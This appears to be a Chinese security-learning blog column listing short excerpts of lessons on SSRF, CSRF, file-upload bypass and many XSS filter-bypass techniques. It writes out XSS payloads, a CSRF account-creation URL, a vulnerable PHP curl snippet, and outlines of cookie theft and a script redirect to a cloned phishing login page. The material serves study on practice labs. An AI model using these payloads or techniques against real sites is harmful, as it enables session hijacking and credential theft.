
安全大师
文章平均质量分 63
菜鸟成神记
骆驼实验室
安全运营学习者,从零出发记录成长脚步。
展开
-
Linux操作系统介绍(简记)
1、使用网络的程序,都有一个服务器;2、服务器,大部分使用的是Liux操作系统。原创 2022-10-27 02:59:28 · 1119 阅读 · 1 评论 -
计算机体系结构(简记)
复杂指令集(Complex Instruction Set Computer):每个指令做复杂动作,完成操作需要较少指令,庞大。各种编程语言开发的软件项目:Java、PHP、C、Python、Ruby、Go…客户端:迅雷、QQ、百度网盘、腾讯课堂、网易云音乐、游戏客户端、腾讯视频.…常见的手机处理器:高通骁龙系列、苹果A系列、海思、麒麟系列、联发科天玑系列。3.5寸机械盘、2.5寸机械盘、2.5寸SATA固态盘、M.2固态盘。输入设备:键盘、鼠标、麦克风、摄像头、扫描仪、数位板、游戏手柄等等;原创 2022-10-27 01:36:56 · 1701 阅读 · 0 评论 -
【安全】P 8-1 XML快速入门
0X01 XML介绍及用途XML 被设计用来传输和存储数据。XML 文档形成了一种树结构,它从"根部"开始,然后扩展到"枝叶"。XML 允许创作者定义自己的标签和自己的文档结构。<?xml version="1.0" encoding="UTF-8"?><note><to>Tove</to><from>Jani</from><heading>Reminder</heading><body>原创 2021-02-28 22:00:06 · 188 阅读 · 0 评论 -
【安全】P 7-3 SSRF利用-内网资源访问
目录0X01 SSRF漏洞代码分析0X02 实验环境搭建0X03 利用SSRF进行内网资源访问0X04 利用SSRF进行端口扫描0X01 SSRF漏洞代码分析一下代码存在SSRF漏洞,分析<?phpif (isset($_GET['url'])){$link = $_GET['url'];$curlobj = curl_init($link);curl_setopt($curlobj, CURLOPT_HEADER, 0);curl_setopt($curlobj, CURLOPT_原创 2021-02-28 21:53:17 · 348 阅读 · 0 评论 -
【安全】P 7-2 产生SSRF漏洞的代码
目录0X01 产生SSRF漏洞的PHP函数0X02 file_get_contents0X03 fsockopen0X03 curl_exec()0X01 产生SSRF漏洞的PHP函数很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。这种形式的攻击称为服务端请求伪造攻击(Server-side Request Forgery)。ssrf攻击可能原创 2021-02-28 19:18:38 · 322 阅读 · 0 评论 -
【安全】P 7-1 SSRF漏洞原理介绍
目录0X01 SSRF漏洞定义0X02 SSRF漏洞原理0X03 SSRF漏洞代码分析0X04 SSRF漏洞利用0X01 SSRF漏洞定义SSRF(server-site request forery,服务端请求伪造)是一种构造请求,由服务端发起请求的安全漏洞。一般情况下,SSRF的目标就是与外部隔离的内网资源。0X02 SSRF漏洞原理SSRF形成原因:服务端提供了从其他服务器获取数据的功能,但没有对内网目标地址做过滤与限制。主要方式:1、对外网、服务器所在内网、本地进行端口扫描,获取Ba原创 2021-02-28 19:14:05 · 929 阅读 · 1 评论 -
【安全】P 6 文件上传漏洞(手工+工具)绕过合集
目录0X01 绕过JS验证JS验证代码分析Burpsuite剔除响应JS浏览器审计工具剔除JS上传Webshell,菜刀连接0X02 绕过MIME-Type验证MIME-Type介绍验证MIME-Type代码分析Burpsuite绕过MIME-Type验证菜刀连接 虚拟终端功能0X03 绕过黑名单验证基于文件后缀名验证介绍基于黑名单验证代码分析Burpsuite绕过黑名单验证上传webshell菜刀连接0X04 绕过黑名单验证(.htaccess).htaccess文件介绍配置文件http.conf审计黑名原创 2021-02-27 23:17:48 · 3628 阅读 · 4 评论 -
【安全】P 5-6 GET型CSRF漏洞利用方法
目录0X01 链接利用0X02 iframe利用0X03 img标签利用0X04 CSS-backgroud利用0X01 链接利用在html中,a标签代表链接,可以将当前的”焦点” 指引到其他位置。移动的“焦点”需要发送对应的请求到链接指向的地址,然后返回响应。<a href = “请求地址,会被http 请求到的位置,可以携带GET型参数”> 内容 </a><a href = “http://127.0.0.1/csrf_test/get_csrf/new_user原创 2021-02-23 20:19:40 · 2109 阅读 · 3 评论 -
【安全】P 5-5 CSRF绕过Referer技巧
目录0X01 Referer防御CSRF原理0X02 Referer防御代码编写0X03 绕过Referer技巧0X04 Burpsuite自动生成POC0X01 Referer防御CSRF原理HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的,服务器基此可以获得一些信息用于处理。当用户点击被构造好的CSRF利用页面,那么在执行用户对应操作时,提交的HTTP请求中就有对应的Referer值,此时服务端判断R原创 2021-02-23 19:34:20 · 470 阅读 · 0 评论 -
【安全】P 5-4 CSRF漏洞token防御介绍
目录0X01 漏洞修补逻辑分析0X02 简单代码模型分析0X03 生成Token代码分析0X04 使用Token进行CSRF漏洞防御0X01 漏洞修补逻辑分析CSRF漏洞实质:服务器无法准确判断当前请求是否是合法用户的自定义操作。如果服务器在用户登录之后给予用户一个唯一合法令牌,每一次操作过程中,服务器都会验证令牌是否正确,如果正确那么执行操作。不正确不执行操作。一般情况下,给予的令牌会写入表单中隐藏域的value值中,随着表单内容进行提交。0X02 简单代码模型分析远程构造CSRF利用P原创 2021-02-23 15:37:08 · 329 阅读 · 0 评论 -
【安全】P 5-3 CSRF漏洞自动化探测
目录0X01 手动探测原理0X02 自动化探测工具介绍0X03 自动化探测工具使用0X04 利用CSRF漏洞0X01 手动探测原理手动探测原理在于探测web应用程序具有防止CSRF的措施。如果Web应用程序的HTTP请求中没有对应的预防措施,那么很大程度上就确定存在CSRF漏洞。0X02 自动化探测工具介绍CSRFTester是一款CSRF漏洞的测试工具。CSRFTester工具的测试原理大概是这样的,使用代理抓取我们在浏览器中访问过的所有的连接以及所有的表单等信息,通过在CSRFTester原创 2021-02-22 23:40:53 · 268 阅读 · 0 评论 -
【安全】P 5-2 无防护的CSRF漏洞利用
目录0X01 GET型CSRF代码分析0X02 GET型CSRF利用0X03 POST型CSRF代码分析0X04 POST型CSRF利用0X01 GET型CSRF代码分析0X02 GET型CSRF利用构造GET型 URL,提交username和password参数,以此来新建对应的用户名和密码。http://127.0.0.1/csrf_test/get_csrf/new_user.php?username=admin111111&password=132251231隐蔽利用 img原创 2021-02-22 23:21:28 · 264 阅读 · 0 评论 -
【安全】P 5-1 CSRF原理介绍
目录0X01 CSRF漏洞定义0X02 CSRF漏洞原理0X03 CSRF漏洞代码分析0X04 CSRF漏洞利用0X01 CSRF漏洞定义CSRF(Cross-site request forery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF。XSS与CSRF区别:1、XSS利用站点内的信任用户,盗取Cookie;2、CSRF通过伪装成受信任用户请求受信任的网站。0X02 CSRF漏洞原理利用目标用户的合法身份,以目标原创 2021-02-22 23:01:41 · 136 阅读 · 0 评论 -
【安全】P 4-28 XSS Fuzzing 工具
目录0X01 XSStrike工具介绍0X02 XSStrike工具安装0X03 XSStrike帮助信息0X04 XSStrike实例演示0X01 XSStrike工具介绍XSStrike是一款检测Cross Site Scripting的高级检测工具。它集成了payload生成器、爬虫和模糊引擎功能。XSStrike不是像其他工具那样注入有效负载并检查其工作,而是通过多个解析器分析响应,然后通过与模糊引擎集成的上下文分析来保证有效负载。除此之外,XSStrike还具有爬行,模糊测试,参数发现,WAF原创 2021-02-21 20:49:05 · 412 阅读 · 1 评论 -
【安全】P 4-27 自动化xss漏洞挖掘
目录0X01 xsser工具介绍0X02 xsser工具原理0X03 xsser帮助信息0X04 xsser启动方式0X01 xsser工具介绍xsser是一款用于针对Web应用程序自动化挖掘、利用、报告xss漏洞的框架。0X02 xsser工具原理官方网站:http://xsser.03c8.net0X03 xsser帮助信息在终端中输入 xsser -h 或 xsser --help注意:使用命令行工具时,不需要全部记忆参数,只需要熟练或者用到的时候查找即可。0X04 xsser原创 2021-02-21 20:31:58 · 341 阅读 · 0 评论 -
【安全】P 4-26 存储型XSS灰盒测试
目录0X01 环境搭建0X02 定向XSS挖掘0X03 黑名单审计0X04 绕过过滤,触发XSS0X01 环境搭建使用PhpStudy搭建 微社区程序——ROCBOSS0X02 定向XSS挖掘XSS漏洞可以存在于个人资料处,文章发表处或者留言评论处等等发表文章功能的未知被HTML实体化,无法继续XSS0X03 黑名单审计私信位置没有被实体化,可以进行XSS,但是被黑名单过滤。没有过滤details和ontaggle0X04 绕过过滤,触发XSS已知程序过滤了javascript,构原创 2021-02-21 20:05:58 · 240 阅读 · 1 评论 -
【安全】P 4-25 XSS发生的位置
0X01 GET型URL中的XSS如果在URL中提交的参数值,在页面中显示。很有可能就存在XSS。bwapp靶场0X02 POST型表单中的XSS如果在表单中提交的参数值,在页面中显示。很有可能就存在XSS。0X03 JSON中的XSSJSON(JavaScript Object Notation) 是一种轻量级的数据交换格式。易于人阅读和编写,同时也易于机器解析和生成,并有效地提升网络传输效率。JSON最常用的格式是对象的 键值对。例如下面这样:{"firstName": "Brett原创 2021-02-21 18:47:05 · 192 阅读 · 1 评论 -
【安全】P 4-24 XSS过滤器绕过
目录0X01 本地环境搭建0X02 XSS payload测试0X03 自动化工具测试0X04 关注最新HTML等内容0X01 本地环境搭建在Web程序中找到过滤的函数,然后拷贝到本地环境,搭建完成。用到之前写过的xss_clean0X02 XSS payload测试kali linux下自带字典,在CTF比赛中经常使用。0X03 自动化工具测试使用Burpsuite进行自动化探测。0X04 关注最新HTML等内容例如HTML5中新标签参考:https://www.owasp.原创 2021-02-21 17:15:12 · 177 阅读 · 1 评论 -
【安全】P 4-23 编码转义介绍
目录0X01 URL编码0X02 html编码0X03 JavaScript编码0X04 编码含义0X01 URL编码url的设计者,考虑到安全传输问题,防止url字符丢失,所以选用了相对较小的、通用的安全字母表。另一方面,url的设计者希望url是完整的,有时候需要url中包含除去通用安全字母表之外的二进制数据和字符(比如中文)。所以url引入了一种转义机制,将不安全的字符编码为安全字符再进行传输。百分号编码:url编码包含一个百分号(%),后面跟着两个表示字符ASCII码的十六进制数。例如:空格转原创 2021-02-21 16:58:11 · 505 阅读 · 1 评论 -
【安全】P 4-22 xss filter过滤器
目录0X01 htmlspecialchars()函数0X02 htmlentities()函数0X03 strip——tags()函数0X04 自定义xss filter0X01 htmlspecialchars()函数htmlspecialchars(string,flags,character-set,double_encode)参考链接:http://www.w3school.com.cn/php/func_string_htmlspecialchars.asp0X02 htmlenti原创 2021-02-21 16:05:15 · 252 阅读 · 0 评论 -
【安全】P 4-21 cookie的httponly设置
目录0X01 cookie介绍0X02 cookie作用0X03 清除cookie0X04 cookie httponly0X01 cookie介绍指某些网站为了辨别用户身份、进行 session 跟踪而储存在用户本地终端上的数据(通常经过加密)。Cookie 是在 HTTP 协议下,服务器或脚本可以维护客户工作站上信息的一种方式。Cookie 是由 Web 服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息。无论何时用户链接到服务器,Web 站点都可以访问 Cookie 信息原创 2021-02-21 15:20:12 · 465 阅读 · 1 评论 -
【安全】P 4-20 浏览器同源策略介绍
目录0X01 源的含义0X02 同源策略0X03 IE源的特殊处理0X04 document.domain0X01 源的含义源指源头,信息来源的位置。在计算机中源在RFC6454文档中规定,源是由协议、主机名、端口名组成。范例: 协议://主机名:端口号/例如:http://www.example.com 与 https://www.example.com 不是同源。0X02 同源策略在计算机中,同源策略(Same-origin Policy , SOP)用于阻止一个非同源的页面恶意代码原创 2021-02-20 23:18:46 · 143 阅读 · 0 评论 -
【安全】P 4-19 unicode绕过过滤触发XSS
目录0X01 unicode介绍0X02 XSS挖掘0X03 双斜杠+unicode绕过0X04 Payload触发XSS0X01 unicode介绍Unicode(统一码、万国码、单一码)是计算机科学领域里的一项业界标准,包括字符集、编码方案等。Unicode 是为了解决传统的字符编码方案的局限而产生的,它为每种语言中的每个字符设定了统一并且唯一的二进制编码,以满足跨语言、跨平台进行文本转换、处理的要求。使用python将字符转换为unicode类型0X02 XSS挖掘构造无害独一字符串,在响原创 2021-02-20 22:27:13 · 262 阅读 · 0 评论 -
【安全】P 4-18 16进制绕过过滤触发XSS
目录0x01 16进制介绍0x02 XSS挖掘0x03 双斜杠+16进制绕过0x04 Payload触发XSS0x01 16进制介绍十六进制转换有16进制每一位上可以是从小到大为0、1、2、3、4、5、6、7、8、9、A、B、C、D、E、F16个大小不同的数,即逢16进1,其中用A,B,C,D,E,F(字母不区分大小写)这六个字母来分别表示10,11,12,13,14,15。使用python将字符转换为16进制类型。0x02 XSS挖掘构造无害独一字符串,在响应在寻找该字符串。0x03 双斜原创 2021-02-20 22:15:54 · 608 阅读 · 0 评论 -
【安全】P 4-17 IE中利用CSS触发XSS
目录0X01 CSS介绍0X02 CSS中执行JS0X03 注释中绕过关键字过滤0X04 Payload触发XSS0X01 CSS介绍层叠样式表(英文全称:Cascading Style Sheets)是一种用来表现HTML(标准通用标记语言的一个应用)或XML(标准通用标记语言的一个子集)等文件样式的计算机语言。CSS不仅可以静态地修饰网页,还可以配合各种脚本语言动态地对网页各元素进行格式化。0X02 CSS中执行JScss expression(css表达式)又称Dynamic propert原创 2021-02-20 21:57:44 · 217 阅读 · 2 评论 -
【安全】P 4-16 利用CSS特性绕过XSS过滤
0X01 XSS漏洞发现构造特殊无害字符串,响应中寻找字符串。0X02 基本XSS利用1、HTML事件触发XSS2、闭合input,利用外部标签触发XSS0X03 CSS特性讲解background:url("javascript:alert(document.domain);"); 设置背景颜色设置background:url ,利用javascript伪协议执行js。 目前IE浏览器支持,其他浏览器已经不再支持0X04 Payload触发XSSPayload: back原创 2021-02-20 21:42:00 · 206 阅读 · 0 评论 -
【安全】P 4-15 利用IE特性绕过XSS特性
0X01 XSS漏洞发现构造特殊无害字符串,响应中寻找字符串。0X02 基本XSS利用1、HTML事件触发XSS0X03 IE特性讲解IE中 两个反引号 `` 可以闭合一个左边双引号。0X04 Payload触发XSSPayload:`` onmousemove=alert(document.domain)----E-----N-----D-----????如有问题,请各位师傅斧正,你的支持是我最大的动力。...原创 2021-02-20 20:36:56 · 221 阅读 · 0 评论 -
【安全】P 4-14 绕过替换script和on事件的XSS
0X01 XSS漏洞发现构造特殊无害字符串,响应中寻找字符串。0X02 绕过思考1、寻找过滤内容2、思考绕过策略:伪协议绕过0X03 伪协议绕过Payload:“> <a href=”javascript:alert(document.domain)”>xss</a>0X04 空格绕过Payload:"><a href="javascr ipt:alert(document.domain);">xss</a>"&原创 2021-02-20 20:25:09 · 532 阅读 · 0 评论 -
【安全】P 4-13 绕过过滤domain为空的XSS
目录0X01 XSS漏洞发现0X02 绕过思考0X03 双写绕过0X04 编码绕过0X01 XSS漏洞发现构造特殊无害字符串,响应中寻找字符串。0X02 绕过思考1、寻找过滤内容2、思考绕过策略:双写绕过编码绕过0X03 双写绕过Payload: “> <script>alert(document.dodomainmain);</script>0X04 编码绕过base64转码Payload: "><script>eva原创 2021-02-20 19:45:21 · 165 阅读 · 0 评论 -
【安全】P 4-12 Javascript伪协议触发XSS
目录0X01 javascript伪协议介绍0X02 XSS漏洞发现0X03 a链接标签属性href介绍0X04 Payload触发XSS漏洞0X01 javascript伪协议介绍将javascript代码添加到客户端的方法是把它放置在伪协议说明符javascript:后的URL中。这个特殊的协议类型声明了URL的主体是任意的javascript代码,它由javascript的解释器运行。如果javascript:URL中的javascript代码含有多个语句,必须使用分号将这些语句分隔开。java原创 2021-02-20 18:37:29 · 1062 阅读 · 0 评论 -
【安全】P 4-11 空格分隔属性的XSS
目录0x01 XSS探测0X02 触发XSS0x01 XSS探测空格分隔属性探测空格之后的内容0X02 触发XSSPayload:111 onmouseover=alert(document.domain);----E-----N-----D-----????如有问题,请各位师傅斧正,你的支持是我最大的动力。...原创 2021-02-18 23:21:19 · 205 阅读 · 0 评论 -
【安全】P 4-10 HTML事件中的XSS
目录0x01 HTML事件介绍0x02 XSS漏洞发现0x03 闭合思路分析0x04 Payload触发XSS漏洞0x01 HTML事件介绍在现代浏览器中都内置有大量的事件处理器。这些处理器会监视特定的条件或用户行为,例如鼠标单击或浏览器窗口中完成加载某个图像。通过使用客户端的 JavaScript,可以将某些特定的事件处理器作为属性添加给特定的标签,并可以在事件发生时执行一个或多个 JavaScript 命令或函数。0x02 XSS漏洞发现设置独一无二字符串提交,在响应中寻找。0x03 闭合原创 2021-02-18 23:09:18 · 328 阅读 · 0 评论 -
【安全】P 4-9 限制输入长度的XSS
0X01 HTML表单文本框介绍HTML 表单用于搜集不同类型的用户输入。表单元素指的是不同类型的 input 元素、复选框、单选按钮、提交按钮等等。text定义常规文本输入。属性介绍:value 属性规定输入字段的初始值readonly 属性规定输入字段为只读(不能修改)disabled 属性规定输入字段是禁用的。被禁用的元素是不可用和不可点击的。被禁用的元素不会被提交。size 属性规定输入字段的尺寸(以字符计)maxlength 属性规定输入字段允许的最大长度如设置 maxlength原创 2021-02-18 00:17:05 · 461 阅读 · 0 评论 -
【安全】P 4-8 隐藏提交参数中的XSS
0X01 HTML表单隐藏参数介绍隐藏域是用来收集或发送信息的不可见元素,对于网页的访问者来说,隐藏域是看不见的。当表单被提交时,隐藏域就会将信息用你设置时定义的名称和值发送到服务器上。代码格式:<input type="hidden" name="..." value="...">0X02 Burpsuite抓包测试使用Burpsutie进行抓包,截取提交的HTTP请求。0X03 HTML中svg介绍SVG 意为可缩放矢量图形(Scalable Vector Graphics)。SV原创 2021-02-17 23:26:19 · 278 阅读 · 0 评论 -
【安全】P 4-7 选择列表中的XSS
0X01 HTML select标签介绍select 元素可创建单选或多选菜单。 元素中的 标签用于定义列表中的可用选项。0X02 表单介绍HTML 表单用于搜集不同类型的用户输入0X03 Burpsuite 测试XSS使用Burpsuite截取HTTP请求,修改提交参数0X04 闭合触发XSSJapan</option><script>alert(document.domain)</script>----E-----N-----D----原创 2021-02-17 22:04:34 · 154 阅读 · 0 评论 -
【安全】P 4-6 标签属性中的XSS
0X01 配置Chrome关闭XSS-Auditorhttps://xss-quiz.int21h.jp/ 利用XSS过程中会出现下图情况。配置Chrome --args --disable-xss-auditor0X02 属性中的XSS发现技巧:ctrl+F 搜索特定字符串0X03 属性中的XSS闭合引入script闭合引号 尖括号,引入script脚本“><script>alert(document.domain);</script>0X04 属性中原创 2021-02-17 21:45:59 · 496 阅读 · 0 评论 -
【安全】P 4-5 未过滤的XSS
0X01 实验环境介绍https://xss-quiz.int21h.jp/一个日本安全研究员制作的XSS练习靶场。0X02 html中文标签介绍 标签规定粗体文本。0X03 探测XSS过程1、构造一个独一无二且不会被识别为恶意代码的字符串用来提交到页面。例如:123qweasdzxc2、使用浏览器审查工具进行代码审查,寻找构造的字符串是否在页面中显示。0X04 闭合文本标签利用XSS1、简单Payload: <script>alert(document.domai原创 2021-02-17 21:27:54 · 127 阅读 · 0 评论 -
【安全】P 4-4 XSS盗取用户信息
0X01 盗取用户信息原理克隆网站登陆页面,利用存储XSS设置跳转代码,如果用户访问即跳转到克隆网站的登陆页面,用户输入登陆,账号和密码被存储。0X02 setookit工具克隆网站万能的社工工具setoolkit0X03 存储XSS跳转克隆网站xss payload:<script>window.location=”http:// ip /” </script>0X04 查看盗取账号和密码(遵纪守法,笔记只是记录实验思路,进去了与本文无关)-----原创 2021-02-17 20:14:40 · 268 阅读 · 3 评论 -
【安全】P 4-3 XSS篡改网页链接
目录0X01 JS代码讲解0X02 XSS篡改链接0X03 篡改链接指向不良URL0X04 篡改链接指向恶意URL0X01 JS代码讲解window.onload 当窗口加载时,执行匿名函数。使用for循环遍历所有获得的链接a标签。<script>window.onload = function() {var link=document.getElementsByTagName("a");for(j = 0; j < link.length; j++) { link[原创 2021-02-17 18:07:31 · 386 阅读 · 1 评论 -
【安全】P 4-2 XSS盗取cookie
目录0X01 cookie介绍0X02 反射XSS盗取cookie0X03 利用cookie会话劫持0X04 劫持会话后的操作0X01 cookie介绍Cookie 是在 HTTP 协议下,服务器或脚本可以维护客户工作站上信息的一种方式。Cookie 是由 Web 服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息。目前有些 Cookie 是临时的,有些则是持续的。临时的 Cookie 只在浏览器上保存一段规定的时间,一旦超过规定的时间,该 Cookie 就会被系统清除服务器可原创 2021-02-17 17:07:12 · 548 阅读 · 0 评论